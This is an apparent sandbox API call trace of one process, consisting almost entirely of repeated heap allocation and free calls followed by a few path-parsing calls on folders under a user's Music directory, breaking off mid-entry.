[0203.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0203.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.115] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\") returned="dKtSN5wkI\\" [0203.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0203.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaf50 [0203.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.115] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\") returned="9AsT-P\\" [0203.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0203.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0203.115] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\") returned="BJHxLX\\" [0203.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1de0 [0203.116] HeapFree (in: 